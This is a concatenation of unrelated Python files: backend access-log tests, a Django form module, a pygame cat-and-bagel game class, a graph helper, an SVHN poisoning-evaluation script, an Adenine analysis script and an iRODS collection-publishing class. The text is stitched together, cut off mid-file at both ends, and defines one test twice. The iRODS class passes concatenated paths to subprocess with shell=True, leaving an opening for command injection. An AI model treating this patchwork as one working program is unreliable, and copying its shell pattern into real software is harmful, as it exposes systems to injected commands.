stdout that are not json if line.startswith('{') ] assert len(accesslog) == 1 assert accesslog[-1] == { 'action': 'insert', 'agent': 'testclient', 'client': 'test-client', 'format': 'json', 'method': 'POST', 'model': 'backends/postgres/report', 'rctype': 'application/json', 'time': accesslog[-1]['time'], 'txn': accesslog[-1]['txn'], 'url': 'https://testserver/backends/postgres/report' } @pytest.mark.models( 'backends/postgres/report', ) def test_accesslog_file_stderr( model: str, postgresql, rc: RawConfig, request, capsys: CaptureFixture, ): rc = rc.fork({ 'accesslog': { 'type': 'file', 'file': 'stderr', }, }) context = create_test_context(rc) request.addfinalizer(context.wipe_all) app = create_test_client(context) app.authmodel(model, ['insert']) resp = app.post(f'/{model}', json={'status': '42'}) assert resp.status_code == 201 store: Store = context.get('store') assert isinstance(store.accesslog, FileAccessLog) cap = capsys.readouterr() accesslog = [ json.loads(line) for line in cap.err.splitlines() # Skip other lines from stdout that are not json if line.startswith('{') ] assert len(accesslog) == 1 assert accesslog[-1] == { 'action': 'insert', 'agent': 'testclient', 'client': 'test-client', 'format': 'json', 'method': 'POST', 'model': 'backends/postgres/report', 'rctype': 'application/json', 'time': accesslog[-1]['time'], 'txn': accesslog[-1]['txn'], 'url': 'https://testserver/backends/postgres/report' } @pytest.mark.models( 'backends/mongo/report', 'backends/postgres/report', ) def test_delete_accesslog(model, app, context): app.authmodel(model, ['insert', 'delete']) resp = app.post(f'/{model}', json={'status': '42'}) assert resp.status_code == 201 data = resp.json() id_ = data['_id'] resp = app.delete(f'/{model}/{id_}') assert resp.status_code == 204 assert resp.content == b'' accesslog = context.get('accesslog.stream') assert len(accesslog) == 2 assert accesslog[-1] == { 'agent': 'testclient', 'format': 'json', 'action': 'delete', 'method': 'DELETE', 'url': f'https://testserver/{model}/{id_}', 'txn': accesslog[-1]['txn'], 'time': accesslog[-1]['time'], 'client': 'test-client', 'model': model, 'id': data['_id'], } @pytest.mark.models( 'backends/mongo/report', 'backends/postgres/report', ) def test_pdf_delete_accesslog(model, app, context): app.authmodel(model, ['insert', 'update', 'getone', 'pdf_getone', 'pdf_update', 'pdf_delete']) id_, rev, resp = _upload_pdf(model, app) resp = app.delete(f'/{model}/{id_}/pdf') assert resp.status_code == 204 assert resp.content == b'' accesslog = context.get('accesslog.stream') assert len(accesslog) == 3 # 3 accesses overall: POST, PUT, DELETE assert accesslog[-1] == { 'agent': 'testclient', 'format': 'json', 'action': 'delete', 'method': 'DELETE', 'url': f'https://testserver/{model}/{id_}/pdf', 'txn': accesslog[-1]['txn'], 'time': accesslog[-1]['time'], 'client': 'test-client', 'model': model, 'prop': 'pdf', 'id': id_, } def _get_object_rev(app, model: str, id_: str) -> str: resp = app.get(f'/{model}/{id_}') assert resp.status_code == 200 data = resp.json() return data['_revision'] @pytest.mark.models( 'backends/mongo/report', 'backends/postgres/report', ) def test_pdf_ref_update_accesslog(model, app, context, tmpdir): app.authmodel(model, ['insert', 'update', 'getone', 'pdf_getone', 'pdf_update', 'pdf_delete']) id_, rev, resp = _upload_pdf(model, app) image = pathlib.Path(tmpdir) / 'image.png' image.write_bytes(b'IMAGEDATA') rev = _get_object_rev(app, model, id_) resp = app.put(f'/{model}/{id_}/pdf:ref', json={ '_id': 'image.png', '_revision': rev }) assert resp.status_code == 200 accesslog = context.get('accesslog.stream') assert len(accesslog) == 4 # 4 accesses overall: POST, PUT, GET, PUT assert accesslog[-1] == { 'agent': 'testclient', 'rctype': 'application/json', 'format': 'json', 'action': 'update', 'method': 'PUT', 'url': f'https://testserver/{model}/{id_}/pdf:ref', 'txn': accesslog[-1]['txn'], 'time': accesslog[-1]['time'], 'client': 'test-client', 'model': model, 'prop': 'pdf', 'id': id_, 'rev': rev, } @pytest.mark.models( 'backends/mongo/report', 'backends/postgres/report', ) def test_batch_write(model, app, context, tmpdir): ns = model[:-len('/report')] app.authmodel(ns, ['insert']) resp = app.post(f'/{ns}', json={ '_data': [ { '_op': 'insert', '_type': model, 'status': 'ok', }, ], }) resp.raise_for_status() accesslog = context.get('accesslog.stream') assert len(accesslog) == 1 assert accesslog[-1] == { 'agent': 'testclient', 'rctype': 'application/json', 'format': 'json', 'action': 'insert', 'method': 'POST', 'url': f'https://testserver/{ns}', 'txn': accesslog[-1]['txn'], 'time': accesslog[-1]['time'], 'client': 'test-client', 'ns': ns, } @pytest.mark.models( 'backends/mongo/report', 'backends/postgres/report', ) def test_stream_write(model, app, context, tmpdir): ns = model[:-len('/report')] app.authmodel(ns, ['insert']) headers = {'content-type': 'application/x-ndjson'} resp = app.post(f'/{ns}', headers=headers, data=json.dumps({ '_op': 'insert', '_type': model, 'status': 'ok', })) resp.raise_for_status() accesslog = context.get('accesslog.stream') assert len(accesslog) == 1 assert accesslog[-1] == { 'agent': 'testclient', 'rctype': 'application/x-ndjson', 'format': 'json', 'action': 'insert', 'method': 'POST', 'url': f'https://testserver/{ns}', 'txn': accesslog[-1]['txn'], 'time': accesslog[-1]['time'], 'client': 'test-client', 'ns': ns, } @pytest.mark.models( 'backends/mongo/report', 'backends/postgres/report', ) def test_ns_read(model, app, context, tmpdir): ns = model[:-len('/report')] app.authmodel(ns, ['getall']) resp = app.get(f'/{ns}/:ns/:all') assert resp.status_code == 200, resp.json() accesslog = context.get('accesslog.stream') assert len(accesslog) == 1 assert accesslog[-1] == { 'agent': 'testclient', 'format': 'json', 'action': 'getall', 'method': 'GET', 'url': f'https://testserver/{ns}/:ns/:all', 'time': accesslog[-1]['time'], 'client': 'test-client', 'ns': ns, } @pytest.mark.models( 'backends/mongo/report', 'backends/postgres/report', ) def test_ns_read(model, app, context, tmpdir): ns = model[:-len('/report')] app.authmodel(ns, ['getall']) resp = app.get(f'/{ns}/:ns/:all/:format/csv') assert resp.status_code == 200 accesslog = context.get('accesslog.stream') assert len(accesslog) == 1 assert accesslog[-1] == { 'agent': 'testclient', 'format': 'csv', 'action': 'getall', 'method': 'GET', 'url': f'https://testserver/{ns}/:ns/:all/:format/csv', 'time': accesslog[-1]['time'], 'client': 'test-client', 'ns': ns, } T = int(input()) for i in range(T): R, S = input().split() R = int(R) S = list(S) for s in S: print(s*R, end="") print()coaches/forms.py0 from django import forms from .widgets import CustomClearableFileInput from .models import Coach, Comment class CoachForm(forms.ModelForm): class Meta: model = Coach fields = '__all__' image = forms.ImageField( label='Image', required=False, widget=CustomClearableFileInput) def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) for field_name, field in self.fields.items(): field.widget.attrs['class'] = 'border-black' class CommentForm(forms.ModelForm): class Meta: model = Comment fields = ( "comment", "stars", ) def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self.fields["comment"].widget.attrs[ "placeholder"] = "Add a Comment here" cat.py0 import pygame, os from bagel import GhostBagel from bullet import Bullet from bullet import AlienBullet from wheat import Wheat pygame.init() class Cat(pygame.sprite.Sprite): paused = False cat = None move = True gameOver = False catNumber = None storedSpeed = 1 # Eating eat = False victim = None eatAnimationTime = 0 # Melon Stuff fired = False fireTimer = 0 shoot = None afterShot = 0 # Weenies! sp1 = False sp2 = False sp3 = False sp4 = False sp5 = False speed = 1 # Pizza .. cat? shield = None totalShield = None pizzaDown = False # Cage Stuff caged = False storedY = 0 targeted = False # Everything Stuff garlicStacks = 0 garlicTimer = 0 healthTick = 0 # Alien Stuff moveTimer = 120 def __init__(self,catType,health,x,y,image,image_eating,number): pygame.sprite.Sprite.__init__(self) self.health = health self.totalHealth = health self.image = image self.cat = image self.image_eating = image_eating self.catType = catType self.rect = self.image.get_rect() self.rect.x = x self.rect.y = y self.catNumber = number # dont put in init! self.mask = pygame.mask.from_surface(self.image) def update(self, paused): self.paused = paused if self.paused == False: if self.move == True: if self.catType != "alien_cat": self.rect.x -= self.speed else: self.moveTimer -= 1 if 0 < self.moveTimer <= 40: self.rect.x -= 1 self.moveTimer -= 1 if self.moveTimer <= 0: self.moveTimer = 120 if self.rect.x <= -100: self.kill() self.remove() if self.rect.x < 0: self.gameOver = True if self.garlicStacks != 0: self.garlicTimer += 1 if self.garlicTimer >= 60: #150 self.healthTick += 1 if self.healthTick == 20: if self.shield > 0: self.shield -= 1 else: self.health -= 1 elif self.healthTick == 40: if self.shield > 0: self.shield -= 1 else: self.health -= 1 self.garlicTimer = 0 self.healthTick = 0 def rainPizzas(self,pizza,allSprites,ghostBagelList,pizza_cat_ns,pizza_cat_eating_ns): #ns = no shield if self.shield <= 0: if self.pizzaDown == False: self.cat = pizza_cat_ns self.image_eating = pizza_cat_eating_ns flyingPizza = GhostBagel(self.rect.x,self.rect.y,pizza) flyingPizza.add(allSprites) flyingPizza.add(ghostBagelList) px = self.rect.x py = self.rect.y self.rect = self.image.get_rect() self.rect.x = px self.rect.y = py if self.eat == False: self.rect.x += 11 self.pizzaDown = True def eatEmCat(self,bagelList,emptyBList): if 10 <= self.eatAnimationTime <= 30: self.image = self.image_eating elif self.eatAnimationTime <= 10: self.image = self.cat elif self.eatAnimationTime >= 30: self.eatAnimationTime = 0 self.image = self.image_eating if self.victim != None and self.caged == False: self.eat = True self.move = False if self.victim.health <= 0 and self.victim.immune == False: self.victim = None self.eat = False self.move = True if self.eat == True and self.paused == False: if self.victim.immune == False: if self.catType != "ninja_cat": self.victim.health -= 1 else: self.victim.health -= 2 self.eatAnimationTime += 1 self.fired = False self.fireTimer = 0 self.shoot = None self.afterShot = 0 elif self.eat == False: self.eatAnimationTime = 0 def eatEmTacoCat(self,bagelList,emptyBList,ghostBagelList,allSprites,plain,poppy,wizard_bagel1,wizard_bagel2,wizard_bagel3,every,crais,mini_bagelsd2,toaster,toasted_mini): if self.victim != None and self.caged == False: self.eat = True self.move = False if 10 <= self.eatAnimationTime <= 30: self.image = self.image_eating elif self.eatAnimationTime <= 10: self.image = self.cat elif self.eatAnimationTime >= 30: self.eatAnimationTime = 0 self.image = self.image_eating if self.eat == True and self.paused == False and self.caged == False: if self.victim.bagelType == "wheat" or self.victim.bagelType == "sesame" or self.victim.bagelType == "cow" or self.victim.bagelType == "multi": self.eatAnimationTime += 1 if self.victim.immune == False: self.victim.health -= 1 elif self.victim.bagelType == "plain" or self.victim.bagelType == "poppy" or self.victim.bagelType == "wizard" or self.victim.bagelType == "everything" or self.victim.bagelType == "crais" or self.victim.bagelType == "mini" or self.victim.bagelType == "toaster": if self.victim.bagelType == "plain": ghostBagel = GhostBagel(self.victim.rect.x,self.victim.rect.y,plain) ghostBagel.add(allSprites) ghostBagel.add(ghostBagelList) elif self.victim.bagelType == "poppy": ghostBagel = GhostBagel(self.victim.rect.x,self.victim.rect.y,poppy) ghostBagel.add(allSprites) ghostBagel.add(ghostBagelList) elif self.victim.bagelType == "wizard": if self.victim.level == 1: ghostBagel = GhostBagel(self.victim.rect.x,self.victim.rect.y,wizard_bagel1) ghostBagel.add(allSprites) ghostBagel.add(ghostBagelList) elif self.victim.level == 2: ghostBagel = GhostBagel(self.victim.rect.x,self.victim.rect.y,wizard_bagel2) ghostBagel.add(allSprites) ghostBagel.add(ghostBagelList) elif self.victim.level == 3: ghostBagel = GhostBagel(self.victim.rect.x,self.victim.rect.y,wizard_bagel3) ghostBagel.add(allSprites) ghostBagel.add(ghostBagelList) elif self.victim.bagelType == "everything": ghostBagel = GhostBagel(self.victim.rect.x,self.victim.rect.y,every) ghostBagel.add(allSprites) ghostBagel.add(ghostBagelList) elif self.victim.bagelType == "crais": ghostBagel = GhostBagel(self.victim.rect.x,self.victim.rect.y,crais) ghostBagel.add(allSprites) ghostBagel.add(ghostBagelList) elif self.victim.bagelType == "mini": ghostBagel1 = GhostBagel(self.victim.rect.x + 2,self.victim.rect.y + 1,mini_bagelsd2) ghostBagel1.add(allSprites) ghostBagel1.add(ghostBagelList) ghostBagel2 = GhostBagel(self.victim.rect.x + 8,self.victim.rect.y + 29,mini_bagelsd2) ghostBagel2.add(allSprites) ghostBagel2.add(ghostBagelList) ghostBagel3 = GhostBagel(self.victim.rect.x + 37,self.victim.rect.y + 13,mini_bagelsd2) ghostBagel3.add(allSprites) ghostBagel3.add(ghostBagelList) elif self.victim.bagelType == "toaster": # Mini bagels fall out of toaster (if they are toasted then fall out toasted) if self.victim.loaded == 0 and self.victim.toastTimer != 0: ghostBagel1 = GhostBagel(self.victim.rect.x,self.victim.rect.y,toaster) ghostBagel1.add(allSprites) ghostBagel1.add(ghostBagelList) elif self.victim.loaded == 1 and self.victim.toastTimer > 0: ghostBagel1 = GhostBagel(self.victim.rect.x,self.victim.rect.y,toaster) ghostBagel1.add(allSprites) ghostBagel1.add(ghostBagelList) ghostBagel2 = GhostBagel(self.victim.rect.x,self.victim.rect.y,mini_bagelsd2) ghostBagel2.add(allSprites) ghostBagel2.add(ghostBagelList) ghostBagel3 = GhostBagel(self.victim.rect.x,self.victim.rect.y,mini_bagelsd2) ghostBagel3.add(allSprites) ghostBagel3.add(ghostBagelList) elif self.victim.loaded == 1 and self.victim.toastTimer <= 0: ghostBagel1 = GhostBagel(self.victim.rect.x,self.victim.rect.y,toaster) ghostBagel1.add(allSprites) ghostBagel1.add(ghostBagelList) ghostBagel2 = GhostBagel(self.victim.rect.x,self.victim.rect.y,toasted_mini) ghostBagel2.add(allSprites) ghostBagel2.add(ghostBagelList) ghostBagel3 = GhostBagel(self.victim.rect.x,self.victim.rect.y,toasted_mini) ghostBagel3.add(allSprites) ghostBagel3.add(ghostBagelList) self.move = True self.victim.remove(bagelList) self.victim.add(emptyBList) self.victim.image = None self.victim.rect = pygame.Surface([66,66]).get_rect() self.victim.rect.x = self.victim.storedx self.victim.rect.y = self.victim.storedy self.victim.bagelType = None self.victim.health = 0 self.victim.level = 1 self.victim.fireTimer = 0 self.eat = False self.victim = None if self.victim != None and self.caged == False: if self.victim.health <= 0 and (self.victim.bagelType != "plain" or self.victim.bagelType != "poppy" or self.victim.bagelType != "everything" or self.victim.bagelType != "crais"): # And these two self.victim = None self.eat = False self.move = True elif self.eat == False: self.eatAnimationTime = 0 def melonFire(self,bagelList,bulletImage,catBulletList,allSprites): for i in bagelList: if (i.rect.y <= self.rect.y <= i.rect.y + 23 or i.rect.y <= self.rect.y + 23 <= i.rect.y + 23) and (i.rect.x < self.rect.x) and (i.rect.x + self.rect.x >= 0) and self.eat == False and i.bagelType != "flagel": # Ignore throwing melons at flagels self.fired = True self.shoot = i if self.fired == True and self.eat == False and self.afterShot == 0 and self.paused == False: self.fireTimer += 1 if self.shoot not in bagelList: self.fired = False if self.fireTimer >= 200: bullet = Bullet(self.rect.x - 12, self.rect.y + 12, bulletImage, "melon", 1, 0, False) bullet.add(catBulletList) bullet.add(allSprites) bullet.bulletCatType = "melon" bullet.speed = -6 self.fireTimer = 0 self.afterShot = 1 if self.afterShot >= 1: self.afterShot += 1 if self.afterShot >= 50: self.afterShot = 0 def alienFire(self,bagelList,bulletImage,alienBulletList,allSprites): maxX = -1 target = None for i in bagelList: if (i.rect.y <= self.rect.y <= i.rect.y + 23 or i.rect.y <= self.rect.y + 23 <= i.rect.y + 23) and (i.rect.x < self.rect.x) and (i.rect.x + self.rect.x >= 0) and self.eat == False and i.bagelType != "flagel": # Ignore throwing melons at flagels if i.rect.x > maxX: self.fired = True maxX = i.rect.x target = i if maxX > -1: self.shoot = target if self.fired == True and self.eat == False and self.paused == False: self.fireTimer += 1 if self.fireTimer >= 1000: bullet = AlienBullet(self.rect.x + 14, self.rect.y - 10,bulletImage, self.shoot) bullet.add(alienBulletList) bullet.add(allSprites) self.fireTimer = 0 if self.shoot not in bagelList: self.fired = False def spawnBabies(self,baby_cat,baby_cat_eating,allSprites,catList): if self.health <= 24 and self.sp1 == False: self.sp1 = True cat = Cat("baby_cat",2,self.rect.x,self.rect.y + 13,baby_cat,baby_cat_eating,100000000000) cat.add(allSprites) cat.add(catList) cat.speed = 3 if self.health <= 18 and self.sp2 == False: self.sp2 = True cat = Cat("baby_cat",2,self.rect.x,self.rect.y + 13,baby_cat,baby_cat_eating,100000000000) cat.add(allSprites) cat.add(catList) cat.speed = 3 if self.health <= 12 and self.sp3 == False: self.sp3 = True cat = Cat("baby_cat",2,self.rect.x,self.rect.y + 13,baby_cat,baby_cat_eating,100000000000) cat.add(allSprites) cat.add(catList) cat.speed = 3 if self.health <= 6 and self.sp4 == False: self.sp4 = True cat = Cat("baby_cat",2,self.rect.x,self.rect.y + 13,baby_cat,baby_cat_eating,100000000000) cat.add(allSprites) cat.add(catList) cat.speed = 3 if self.health <= 0 and self.sp5 == False: self.sp5 = True cat = Cat("baby_cat",2,self.rect.x,self.rect.y + 13,baby_cat,baby_cat_eating,100000000000) cat.add(allSprites) cat.add(catList) cat.speed = 3 cat2 = Cat("baby_cat",2,self.rect.x + 35,self.rect.y + 13,baby_cat,baby_cat_eating,100000000000) cat2.add(allSprites) cat2.add(catList) cat2.speed = 3 cat3 = Cat("baby_cat",2,self.rect.x + 70,self.rect.y + 13,baby_cat,baby_cat_eating,100000000000) cat3.add(allSprites) cat3.add(catList) cat3.speed = 3 def onDeath(self,wheat_image,wheatList,allSprites): if self.health <= 0: self.kill() self.remove() if self.catType != "baby_cat": wheat = Wheat(self.rect.x,self.storedY,wheat_image) wheat.move = False wheat.add(wheatList) wheat.add(allSprites) def draw(self, screen): # Absolutely 100% completely necessary screen.blit(self.image, self.rect) def __getstate__(self): d = dict(self.__dict__) if 'image' in d: del d['image'] if 'mask' in d: del d['mask'] if 'cat' in d: del d['cat'] if 'victim' in d: del d['victim'] if 'image_eating' in d: del d['image_eating'] return d def __setstate__(self, d): self.__dict__.update(d) ZacharyJohnson1/python-graph-theory class Relax: @staticmethod def relax(u, v, w): if v.get_distance() > u.get_distance() + w: v.set_distance(u.get_distance() + w) v.set_parent(u)Bhaskers-Blu-Org1/model-sanitization10-100 from __future__ import print_function import argparse import numpy as np import os import shutil import torch import torch.nn as nn import torch.nn.functional as F import torch.optim as optim from torchvision import datasets, transforms from torch.autograd import Variable import utils import models import torchvision # Training settings parser = argparse.ArgumentParser(description='PyTorch Slimming CIFAR training') parser.add_argument('--dataset', type=str, default='svhn', help='training dataset (default: cifar100)') parser.add_argument('--batch-size', type=int, default=128, metavar='N', help='input batch size for training (default: 64)') parser.add_argument('--test-batch-size', type=int, default=100, metavar='N', help='input batch size for testing (default: 256)') parser.add_argument('--epochs', type=int, default=30, metavar='N', help='number of epochs to train (default: 160)') parser.add_argument('--start-epoch', default=0, type=int, metavar='N', help='manual epoch number (useful on restarts)') parser.add_argument('--lr', type=float, default=0.01, metavar='LR', help='learning rate (default: 0.1)') parser.add_argument('--momentum', type=float, default=0.9, metavar='M', help='SGD momentum (default: 0.9)') parser.add_argument('--weight-decay', '--wd', default=1e-4, type=float, metavar='W', help='weight decay (default: 1e-4)') parser.add_argument('--resume', default='logs/checkpoint.pth.tar', type=str, metavar='PATH', #logs/checkpoint.pth.tar help='path to latest checkpoint (default: none)') parser.add_argument('--no-cuda', action='store_true', default=False, help='disables CUDA training') parser.add_argument('--seed', type=int, default=1, metavar='S', help='random seed (default: 1)') parser.add_argument('--log-interval', type=int, default=10, metavar='N', help='how many batches to wait before logging training status') parser.add_argument('--save', default='./logs', type=str, metavar='PATH', help='path to save prune model (default: current directory)') parser.add_argument('--arch', default='vgg', type=str, help='architecture to use') parser.add_argument('--depth', default=16, type=int, help='depth of the neural network') args = parser.parse_args() args.cuda = not args.no_cuda and torch.cuda.is_available() torch.manual_seed(args.seed) if args.cuda: torch.cuda.manual_seed(args.seed) if not os.path.exists(args.save): os.makedirs(args.save) testset = datasets.SVHN('./data.svhn', split='test', transform=transforms.Compose([ transforms.ToTensor()])) transform_test = transforms.Compose([ transforms.ToTensor(), # transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)), ]) testset1 = torchvision.datasets.SVHN('./data1', split='test', download=True, transform=transform_test) #test_set1 = utils.loaders_poison_2(testset1) kwargs = {'num_workers': 1, 'pin_memory': True} if args.cuda else {} if args.dataset == 'svhn': # train_loader = torch.utils.data.DataLoader(train_set, batch_size=args.batch_size, shuffle=True, **kwargs) test_loader = torch.utils.data.DataLoader(testset, batch_size=args.test_batch_size, shuffle=True, **kwargs) model = models.__dict__[args.arch](dataset=args.dataset, depth=args.depth) if args.cuda: model.cuda() criterion = nn.CrossEntropyLoss() optimizer = optim.SGD(model.parameters(), lr=args.lr, momentum=args.momentum, weight_decay=args.weight_decay) if args.resume: if os.path.isfile(args.resume): print("=> loading checkpoint '{}'".format(args.resume)) checkpoint = torch.load(args.resume) args.start_epoch = checkpoint['epoch'] best_prec1 = checkpoint['best_prec1'] model.load_state_dict(checkpoint['state_dict']) optimizer.load_state_dict(checkpoint['optimizer']) print("=> loaded checkpoint '{}' (epoch {}) Prec1: {:f}" .format(args.resume, checkpoint['epoch'], best_prec1)) else: print("=> no checkpoint found at '{}'".format(args.resume)) def test(): model.eval() test_loss = 0 correct = 0 for data, target in test_loader: if args.cuda: data, target = data.cuda(), target.cuda() data, target = Variable(data, volatile=True), Variable(target) output = model(data) test_loss += F.cross_entropy(output, target, size_average=False).item() # sum up batch loss pred = output.data.max(1, keepdim=True)[1] # get the index of the max log-probability correct += pred.eq(target.data.view_as(pred)).cpu().sum() test_loss /= len(test_loader.dataset) print('\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.1f}%)\n'.format( test_loss, correct, len(test_loader.dataset), 100. * correct / len(test_loader.dataset))) return correct / float(len(test_loader.dataset)) def save_checkpoint(state, is_best, filepath): torch.save(state, os.path.join(filepath, 'checkpoint.pth.tar')) if is_best: shutil.copyfile(os.path.join(filepath, 'checkpoint.pth.tar'), os.path.join(filepath, 'model_best.pth.tar')) best_prec1 = 0. #for epoch in range(args.start_epoch, args.epochs): # if epoch in [args.epochs*0.5, args.epochs*0.75]: # for param_group in optimizer.param_groups: # param_group['lr'] *= 0.1 # train(epoch) prec1 = test() res = utils.test_poison(testset1, model, criterion) print(res['accuracy']) # is_best = prec1 > best_prec1 # best_prec1 = max(prec1, best_prec1) # save_checkpoint({ # 'epoch': epoch + 1, # 'state_dict': model.state_dict(), # 'best_prec1': best_prec1, # 'optimizer': optimizer.state_dict(), # 'cfg': model.cfg # }, is_best, filepath=args.save) #!/usr/bin/env python """Adenine analysis script.""" ###################################################################### # Copyright (C) 2016 , , # # FreeBSD License ###################################################################### from __future__ import print_function import imp import sys import os import time import logging import argparse import gzip import numpy as np try: import cPickle as pkl except: import pickle as pkl from adenine.core import analyze_results from adenine.utils import extra def init_main(): """Init analysis main.""" from adenine import __version__ parser = argparse.ArgumentParser(description='Adenine script for ' 'analysing pipelines.') parser.add_argument('--version', action='version', version='%(prog)s v' + __version__) parser.add_argument("result_folder", help="specify results directory") args = parser.parse_args() root_folder = args.result_folder filename = [f for f in os.listdir(root_folder) if os.path.isfile(os.path.join(root_folder, f)) and '.pkl' in f and f != "__data.pkl"] if not filename: sys.stderr.write("No .pkl file found in {}. Aborting...\n" .format(root_folder)) sys.exit(-1) # Run analysis # print("Starting the analysis of {}".format(filename)) main(os.path.join(os.path.abspath(root_folder), filename[0])) def main(dumpfile): """Analyze the pipelines.""" # Load the configuration file config_path = os.path.dirname(dumpfile) config_path = os.path.join(os.path.abspath(config_path), 'ade_config.py') config = imp.load_source('ade_config', config_path) extra.set_module_defaults(config, {'file_format': 'pdf', 'plotting_context': 'paper', 'verbose': False}) if hasattr(config, 'use_compression'): use_compression = config.use_compression else: use_compression = False # Load the results used with ade_run.py try: if use_compression: with gzip.open(os.path.join(os.path.dirname(dumpfile), '__data.pkl.tz'), 'r') as fdata: data_X_y_index = pkl.load(fdata) data = data_X_y_index['X'] labels = data_X_y_index['y'] index = data_X_y_index['index'] else: with open(os.path.join(os.path.dirname(dumpfile), '__data.pkl'), 'r') as fdata: data_X_y_index = pkl.load(fdata) data = data_X_y_index['X'] labels = data_X_y_index['y'] index = data_X_y_index['index'] except IOError: if use_compression: data_filename = '__data.pkl.tz' else: data_filename = '__data.pkl' sys.stderr.write("Cannot load {} Reloading data from " "config file ...".format(data_filename)) data = config.X labels = config.y index = config.index if hasattr(config, 'index') \ else np.arange(data.shape[0]) # Read the feature names from the config file feat_names = config.feat_names if hasattr(config, 'feat_names') \ else np.arange(data.shape[1]) # Initialize the log file filename = 'results_' + os.path.basename(dumpfile)[0:-7] logfile = os.path.join(os.path.dirname(dumpfile), filename + '.log') logging.basicConfig(filename=logfile, level=logging.INFO, filemode='w', format='%(levelname)s (%(name)s): %(message)s') root_logger = logging.getLogger() lsh = logging.StreamHandler() lsh.setLevel(20 if config.verbose else logging.ERROR) lsh.setFormatter( logging.Formatter('%(levelname)s (%(name)s): %(message)s')) root_logger.addHandler(lsh) tic = time.time() print("\nUnpickling output ...", end=' ') # Load the results if use_compression: with gzip.open(dumpfile, 'r') as fres: res = pkl.load(fres) else: with open(dumpfile, 'r') as fres: res = pkl.load(fres) print("done: {} s".format(extra.sec_to_time(time.time() - tic))) # Analyze the pipelines analyze_results.analyze(input_dict=res, root=os.path.dirname(dumpfile), y=labels, feat_names=feat_names, index=index, plotting_context=config.plotting_context, file_format=config.file_format) root_logger.handlers[0].close() if __name__ == '__main__': init_main() #!/usr/bin/env python """ @licence: Apache 2.0 @Copyright (c) 2017, (SURFsara) @author: """ #iRODS imports from irods.session import iRODSSession from irods.access import iRODSAccess import irods.keywords as kw #iRODS tickets import subprocess #File and password handling import os import shutil import getpass #PID imports import uuid class irodsPublishCollection(): def __init__(self, envFile, collPath, host='ibridges', user='data', zone='myZone'): if envFile == '': #workaround for testing and when icommands not available print 'irods ', host, 'user ', user, 'zone', zone pw = getpass.getpass().encode('base64') self.session = iRODSSession(host=host, port=1247, user=user, password=pw.decode('base64'), zone=zone) else: self.session = iRODSSession(irods_env_file=envFile) self.coll = self.session.collections.get(collPath) self.mdUpdate('SERIESINFORMATION', 'iRODS Collection '+ self.coll.path) self.md = self.mdGet() def size(self): size = sum([obj.size for obj in self.coll.data_objects]) return size def validate(self, repoKeys = []): ''' Checks whether collection is not empty and is not a nested collection. repoKeys is a set of keys in te iRODS metadata that indicate, when present, that the data have already been published. ''' errorMsg = [] if self.coll.subcollections != []: errorMsg.append('PUBLISH ERROR: Collection contains subcollections.') if self.coll.data_objects == []: errorMsg.append('PUBLISH ERROR: Collection does not contain data.') if len(set(self.coll.metadata.keys()).intersection(repoKeys)) > 0: errorMsg.append('PUBLISH ERROR: Data is already published.') for item in self.coll.metadata.items(): errorMsg.append(item.name+': '+item.value) return errorMsg def assignTicket(self, all = True): ''' Creates irods tickets for anonymous read access for the collection. Ticket can be used in metalnx or wth the icommands to download data. It also creates a metadata entry for the ticket in the metadata of the respective data object or collection to avoid long searches through the iCAT. Note: Not yet available in python client (v0.8), hence icommands wrapper! Returns a dictionary mapping from iRODS paths to tickets. Requires icommands! ''' tickets = {} errorMsg = [] #iticket create read #imeta add TICKET cmd = 'iticket create read ' + self.coll.path p = subprocess.Popen([cmd], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) out, err = p.communicate() if out == '': errorMsg.append('TICKET ERROR: No ticket created '+ err) return tickets, errorMsg msg = self.mdUpdate('TICKET', out.split(':')[1].strip()) tickets[self.coll.path] = out.split(':')[1].strip() self.mdUpdate('TECHNICALINFO', '{"irods_host": "'+self.session.host \ + '", "irods_port": 1247, "irods_user_name": "anonymous", "irods_zone_name": "' \ + self.session.zone+ '"}; iget/ils -t ' + self.coll.path ) if not all: return tickets, errorMsg for obj in self.coll.data_objects: cmd = 'iticket create read ' + obj.path p = subprocess.Popen([cmd], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) out, err = p.communicate() if out == '': errorMsg.append('TICKET ERROR: No ticket created '+ err) return tickets, errorMsg obj.metadata.add('TICKET', out.split(':')[1].strip()) tickets[obj.path] = out.split(':')[1].strip() return tickets, errorMsg def assignPID(self, pidClient, all = True): ''' Creates epic PIDs for the collection and all its members. Returns a dictionary mapping from iRODS paths to PIDs. pidCredentials - instance of B2Handle EUDATHandleClient. ''' pids = {} #TODO: mint real PIDs pid = str(uuid.uuid1()) self.mdUpdate("PID", pid) pids[self.coll.name] = pid if all: for obj in self.coll.data_objects: pid = str(uuid.uuid1()) obj.metadata.add("PID", pid) pids[obj.name] = pid return pids def close(self, owners = set()): ''' Set permission to read only for group 'public'. Get list of users who created the data. The original creator of the data can be retrieved with obj.owner_name. Script should be executed by a service account for data publishing (role data steward). owners - set of all additinatiol users who have write access to the collection and data objects. ''' #close each data object for obj in self.coll.data_objects: acl = iRODSAccess('read', obj.path, 'public', self.session.zone) self.session.permissions.set(acl) acl = iRODSAccess('read', obj.path, obj.owner_name, self.session.zone) self.session.permissions.set(acl) for owner in owners: acl = iRODSAccess('read', obj.path, owner, self.session.zone) self.session.permissions.set(acl) owners.add(obj.owner_name) #close collection acl = iRODSAccess('read', self.coll.path, 'public', self.session.zone) self.session.permissions.set(acl) for owner in owners: acl = iRODSAccess('read', self.coll.path, owner, self.session.zone) self.session.permissions.set(acl) return owners def open(self, owners): ''' Open collection for writing to certain iRODS users (owners). ''' for owner in owners: acl = iRODSAccess('write', self.coll.path, owner, self.session.zone) self.session.permissions.set(acl) for obj in self.coll.data_objects: acl = iRODSAccess('write', obj.path, owner, self.session.zone) self.session.permissions.set(acl) return ['COLLECTION WRITE ACCESS: ' + str(owners)] def mdUpdate(self, key, value): ''' Update metadata of collection. ''' if key in self.coll.metadata.keys(): print 'METADATA INFO: Collection has already metadata with key: ' + key print 'METADATA INFO: Update metadata entry.' for item in self.coll.metadata.items(): if item.name == key: self.coll.metadata.remove(item) self.coll.metadata.add(key, value) self.md = self.mdGet() return ['METADATA ADDED; '+key+' '+value] def mdGet(self): ''' Reformatting od all metadata of the collection into a python dictionary. ''' metadata = {} for item in self.coll.metadata.items(): metadata[item.name] = item.value return metadata def 